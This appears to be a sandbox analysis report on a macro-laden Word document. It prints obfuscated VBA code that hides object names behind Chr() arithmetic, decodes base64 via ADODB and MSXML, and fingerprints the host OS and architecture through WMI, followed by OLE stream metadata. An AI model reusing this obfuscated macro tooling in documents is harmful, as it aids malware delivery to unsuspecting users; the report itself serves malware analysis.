    Set AU3sjrvsqt3j = CreateObject((Chr(-94 + 159) & Chr(3 + 65) & Chr(-12 + 91) & Chr(60 + 8) & Chr(-85 + 151) & Chr(38 + 8) & Chr(-2 + 85) & Chr(20 + 96) & Chr(68 + 46) & Chr(83 + 18) & Chr(-71 + 168) & Chr(62 + 47)))

    AU3sjrvsqt3j.Type = AS9fvfrob

    AU3sjrvsqt3j.Charset = (Chr(17 + 100) & Chr(56 + 59) & Chr(71 + -26) & Chr(-16 + 113) & Chr(-88 + 203) & Chr(-14 + 113) & Chr(48 + 57) & Chr(-19 + 124))

    AU3sjrvsqt3j.Open

    AU3sjrvsqt3j.WriteText Text

    AU3sjrvsqt3j.Position = 0

    AU3sjrvsqt3j.Type = AT6yshkqzy

    AU3sjrvsqt3j.Position = 0

    AR4ql6nqd = AU3sjrvsqt3j.Read

    Set AU3sjrvsqt3j = Nothing

End Function



Function AV0kftndmk(Binary)

    Const AS9fvfrob = 2

    Const AT6yshkqzy = 1

    Dim AU3sjrvsqt3j

    Set AU3sjrvsqt3j = CreateObject((Chr(-6 + 71) & Chr(89 + -21) & Chr(52 + 27) & Chr(61 + 7) & Chr(39 + 27) & Chr(-9 + 55) & Chr(56 + 27) & Chr(-52 + 168) & Chr(39 + 75) & Chr(5 + 96) & Chr(57 + 40) & Chr(22 + 87)))

    AU3sjrvsqt3j.Type = AT6yshkqzy

    AU3sjrvsqt3j.Open

    AU3sjrvsqt3j.Write Binary

    AU3sjrvsqt3j.Position = 0

    AU3sjrvsqt3j.Type = AS9fvfrob

    AU3sjrvsqt3j.Charset = (Chr(8 + 109) & Chr(-23 + 138) & Chr(1 + 44) & Chr(-78 + 175) & Chr(39 + 76) & Chr(-16 + 115) & Chr(-80 + 185) & Chr(92 + 13))

    AV0kftndmk = AU3sjrvsqt3j.ReadText

    Set AU3sjrvsqt3j = Nothing

End Function













Function getOS() As String

    On Error Resume Next

    Dim OS

    For Each OS In GetObject("winmgmts:").InstancesOf("Win32_OperatingSystem")

        getOS = OS.Caption

    Next OS

    Set OS = Nothing

End Function



Public Function IsWin32OrWin64() As String

    On Error Resume Next

    Dim proc_query As String

    Dim proc_results As Object

    Dim info As Object

    

    proc_query = "SELECT * FROM Win32_Processor"

    Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)

    For Each info In proc_results

VBA Code

Attribute VB_Name = "NewMacros"



















Function AL8vhpb5hk3w(AO3opbjnrp9)
    Dim AM1wg7xyr, AN9vxh3lbsda
    Set AM1wg7xyr = CreateObject((Chr(-57 + 134) & Chr(-21 + 136) & Chr(-26 + 146) & Chr(83 + 26) & Chr(-76 + 184) & Chr(91 + -41) & Chr(32 + 14) & Chr(15 + 53) & Chr(-16 + 95) & Chr(-69 + 146) & Chr(20 + 48) & Chr(-81 + 192) & Chr(97 + 2) & Chr(29 + 88) & Chr(23 + 86) & Chr(26 + 75) & Chr(-28 + 138) & Chr(-5 + 121) & Chr(54 + -8) & Chr(10 + 41) & Chr(74 + -28) & Chr(45 + 3)))
    Set AN9vxh3lbsda = AM1wg7xyr.CreateElement((Chr(-90 + 188) & Chr(52 + 45) & Chr(7 + 108) & Chr(-17 + 118) & Chr(-53 + 107) & Chr(0 + 52)))
    AN9vxh3lbsda.dataType = (Chr(-91 + 189) & Chr(-44 + 149) & Chr(-63 + 173) & Chr(61 + -15) & Chr(-85 + 183) & Chr(5 + 92) & Chr(28 + 87) & Chr(100 + 1) & Chr(100 + -46) & Chr(34 + 18))
    AN9vxh3lbsda.nodeTypedValue = AR4ql6nqd(AO3opbjnrp9)
    AL8vhpb5hk3w = AN9vxh3lbsda.Text
    Set AN9vxh3lbsda = Nothing
    Set AM1wg7xyr = Nothing
End Function

Function AP6fuezipn4(ByVal AQ4ilbevk2j)
    Dim AM1wg7xyr, AN9vxh3lbsda
    Set AM1wg7xyr = CreateObject((Chr(10 + 67) & Chr(85 + 30) & Chr(85 + 35) & Chr(-97 + 206) & Chr(-64 + 172) & Chr(61 + -11) & Chr(-42 + 88) & Chr(-77 + 145) & Chr(-93 + 172) & Chr(-52 + 129) & Chr(39 + 29) & Chr(87 + 24) & Chr(-70 + 169) & Chr(-33 + 150) & Chr(12 + 97) & Chr(-13 + 114) & Chr(33 + 77) & Chr(-22 + 138) & Chr(-65 + 111) & Chr(27 + 24) & Chr(68 + -22) & Chr(71 + -23)))
    Set AN9vxh3lbsda = AM1wg7xyr.CreateElement((Chr(5 + 93) & Chr(-68 + 165) & Chr(51 + 64) & Chr(92 + 9) & Chr(-100 + 154) & Chr(46 + 6)))
    AN9vxh3lbsda.dataType = (Chr(67 + 31) & Chr(-17 + 122) & Chr(4 + 106) & Chr(-51 + 97) & Chr(-9 + 107) & Chr(78 + 19) & Chr(97 + 18) & Chr(-27 + 128) & Chr(48 + 6) & Chr(54 + -2))
    AN9vxh3lbsda.Text = AQ4ilbevk2j
    If AQ4ilbevk2j = "" Then
        AP6fuezipn4 = ""
    Else
        AP6fuezipn4 = AV0kftndmk(AN9vxh3lbsda.nodeTypedValue)
    End If
    Set AN9vxh3lbsda = Nothing
    Set AM1wg7xyr = Nothing
End Function

Function AR4ql6nqd(Text)
  Const AS9fvfrob = 2
  Const AT6yshkqzy = 1
  Dim AU3sjrvsqt3j
  Set AU3sjrvsqt3j = CreateObject((Chr(-94 + 159) & Chr(3 + 65) & Chr(-12 + 91) & Chr(60 + 8) & Chr(-85 + 151) & Chr(38 + 8) & Chr(-2 + 85) & Chr(20 + 96) & Chr(68 + 46) & Chr(83 + 18) & Chr(-71 + 168) & Chr(62 + 47)))
  AU3sjrvsqt3j.Type = AS9fvfrob
  AU3sjrvsqt3j.Charset = (Chr(17 + 100) & Chr(56 + 59) & Chr(71 + -26) & Chr(-16 + 113) & Chr(-88 + 203) & Chr(-14 + 113) & Chr(48 + 57) & Chr(-19 + 124))
  AU3sjrvsqt3j.Open
  AU3sjrvsqt3j.WriteText Text
  AU3sjrvsqt3j.Position = 0
  AU3sjrvsqt3j.Type = AT6yshkqzy
  AU3sjrvsqt3j.Position = 0
  AR4ql6nqd = AU3sjrvsqt3j.Read
  Set AU3sjrvsqt3j = Nothing
End Function

Function AV0kftndmk(Binary)
  Const AS9fvfrob = 2
  Const AT6yshkqzy = 1
  Dim AU3sjrvsqt3j
  Set AU3sjrvsqt3j = CreateObject((Chr(-6 + 71) & Chr(89 + -21) & Chr(52 + 27) & Chr(61 + 7) & Chr(39 + 27) & Chr(-9 + 55) & Chr(56 + 27) & Chr(-52 + 168) & Chr(39 + 75) & Chr(5 + 96) & Chr(57 + 40) & Chr(22 + 87)))
  AU3sjrvsqt3j.Type = AT6yshkqzy
  AU3sjrvsqt3j.Open
  AU3sjrvsqt3j.Write Binary
  AU3sjrvsqt3j.Position = 0
  AU3sjrvsqt3j.Type = AS9fvfrob
  AU3sjrvsqt3j.Charset = (Chr(8 + 109) & Chr(-23 + 138) & Chr(1 + 44) & Chr(-78 + 175) & Chr(39 + 76) & Chr(-16 + 115) & Chr(-80 + 185) & Chr(92 + 13))
  AV0kftndmk = AU3sjrvsqt3j.ReadText
  Set AU3sjrvsqt3j = Nothing
End Function






Function getOS() As String
On Error Resume Next
    Dim OS
    For Each OS In GetObject("winmgmts:").InstancesOf("Win32_OperatingSystem")
        getOS = OS.Caption
    Next OS
    Set OS = Nothing
End Function

Public Function IsWin32OrWin64() As String
On Error Resume Next
    Dim proc_query As String
    Dim proc_results As Object
    Dim info As Object
    
    proc_query = "SELECT * FROM Win32_Processor"
    Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
    For Each info In proc_results
        IsWin32OrWin64 = info.AddressWidth & "-bit"
    Next

VBA File Name: ThisDocument.cls, Stream Size: 1097

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1097
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . D . . . R . . . . . . . . . . . . . . . M ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . f 1 . . 4 . @ . ^ . . . . I . B \\ c ! n . . C . K . . O p 4 . . . . . . . . . . . . . . . . . . . . . . . a . $ . . H . . . . w 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . a . $ . . H . . . . w 3 . . . f 1 . . 4 . @ . ^ . . . . I . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 06 00 01 00 00 16 03 00 00 e4 00 00 00 ea 01 00 00 44 03 00 00 52 03 00 00 a6 03 00 00 00 00 00 00 01 00 00 00 4d 27 05 df 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 c6 66 31 1d ae 34 f7 40 b3 5e a2 9f c2 1b 49 a9 42 5c 63 21 6e d1 d8 43 8b 4b bb 94 4f 70 34 d3 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code with Deobfuscations

Attribute VB_Name = "ThisDocument"

Attribute VB_Base = "1Normal.ThisDocument"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = True

Attribute VB_Customizable = True

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.2359563651
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	280
Entropy:	2.38363343331
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 408

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	408
Entropy:	3.1371856448
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L a r a . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f8 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 16769

General
Stream Path:	1Table
File Type:	data
Stream Size:	16769
Entropy:	6.46592721653
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	0a 06 11 00 12 00 01 00 73 01 0f 00 07 00 05 00 05 00 05 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 79536

General
Stream Path:	Data
File Type:	data
Stream Size:	79536
Entropy:	7.98136640998
Base64 Encoded:	True
Data ASCII:	. 6 . . D . d . . . . . . . . . . . . . . . . . . . . . t # n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . U . n . t . i . t . l . e . d . . . P . i . c . t . u . r . e . . 3 . . . C . : . \\ . U . s . e . r . s . \\ . t . e . s . t . a . d . m . i . n . \\ . D . e . s . k . t . o . p . \\ . U . n . t . i . t .
Data Raw:	b0 36 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 74 23 6e 1a e1 03 e1 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 de 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 93 00 0b f0 ac 00 00 00 7f 00 80 00 f9 01 04 41 01 00 00 00 05 c1 12 00 00 00 3f 01 00 00 06 00 bf 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 430

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	430
Entropy:	5.38651703035
Base64 Encoded:	True
Data ASCII:	I D = " { C C B 4 F 9 4 9 - 2 8 0 F - 4 4 2 3 - 9 B F 0 - 3 0 3 9 1 5 F 1 3 3 A A } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 3 7 1 B 5 4 3 2 D 4 7 2 D 4 7 2 D 4 7 2 D 4 7 " . . D P B = " E 7 E 5 2 1 D F E 1 2 7 5 4 2 8 5 4 2 8 5 4 " . . G C = " 5 B 5 9 9 D 6 B 1 0 6 C
Data Raw:	49 44 3d 22 7b 43 43 42 34 46 39 34 39 2d 32 38 30 46 2d 34 34 32 33 2d 39 42 46 30 2d 33 30 33 39 31 35 46 31 33 33 41 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	71
Entropy:	3.34859995248
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4592

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4592
Entropy:	5.28689188874
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:	cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 54629

General
Stream Path:	Macros/VBA/__SRP_0
File Type:	data
Stream Size:	54629
Entropy:	3.94641189095
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . 8 . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . l [ . . A . . . U 7 . 1 . . . . . . . .
Data Raw:	93 4b 2a a3 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 38 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00

Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 203

General
Stream Path:	Macros/VBA/__SRP_1
File Type:	data
Stream Size:	203
Entropy:	3.57308788581
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . A O 3 o p b j n r p 9 . . . . . . . . A Q 4 i l b e v k 2 j . . . . . . . . T e x t . . . . . . . . B i n a r y . . . . . . . . V a l u e . . . . . . . . Y o u r P a t h [ . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 09 00 00 00 00 00 04 00 03 00 00 09 d9 02 00 00 00 00 00 00 31 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 03 00 00 08 0b 00 00 00 41 4f 33 6f 70 62 6a 6e 72 70 39 03 00 00 08 0b 00 00

Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 220

General
Stream Path:	Macros/VBA/__SRP_2
File Type:	data
Stream Size:	220
Entropy:	2.14975395637
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . 1 . . . . . . . a . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 b9 05 00 00 00 00 00 00 e1 05 00 00 00 00 00 00 09 06 00 00 00 00 00 00 09 00 00 00 01 00 02 00 91 05 00 00 00 00 00 00 08 00 0d 00 34 00 00 00 31 06 00 00 00 00 00 00 61 00 00 00 00 00

Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 66

General
Stream Path:	Macros/VBA/__SRP_3
File Type:	data
Stream Size:	66
Entropy:	1.75895870298
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . n . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00

Stream Path: Macros/VBA/__SRP_4, File Type: data, Stream Size: 832

General
Stream Path:	Macros/VBA/__SRP_4
File Type:	data
Stream Size:	832
Entropy:	2.48706696998
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / ( . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / ( . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / $ . ! . . . . . . . . . . ` . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 05 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 28 00 81 00 00 00 00 00 05 00 00 00 00 60 04 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01 00 00 00 00 00 0f 2f 28 00 a9 00 00 00 00 00 05 00 01 00 00 60 04 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00

Stream Path: Macros/VBA/__SRP_5, File Type: data, Stream Size: 18772

General
Stream Path:	Macros/VBA/__SRP_5
File Type:	data
Stream Size:	18772
Entropy:	4.88615379941
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . ~ \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 04 00 08 00 00 00 00 00 05 00 13 00 00 00 b4 01 00 00 f1 09 00 00 00 00 00 00 01 0b 00 00 00 00 00 00 71 0b 00 00 00 00 00 00 09 0a 00 00 00 00 00 00 49 0a 00 00 00 00 00 00 d1 00 00 00 00 00 05 00 79 0a 00 00 00 00 00 00 c1 0a 00 00 00 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 578

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	578
Entropy:	6.3173414773
Base64 Encoded:	True
Data ASCII:	. > . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . Y . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . .
Data Raw:	01 3e b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 d4 e9 8e 59 1c 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 5166

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	5166
Entropy:	3.45862834817
Base64 Encoded:	False
Data ASCII:	. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p a ! \\ p a ! \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5b e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 f0 11 00 00 0e 00 62 6a 62 6a 12 0b 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 14 00 00 70 61 21 5c 70 61 21 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d5 01 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Stream Path: _xmlsignatures/30468, File Type: XML document text, Stream Size: 13897

General
Stream Path:	_xmlsignatures/30468
File Type:	XML document text
Stream Size:	13897
Entropy:	5.97954736124
Base64 Encoded:	True
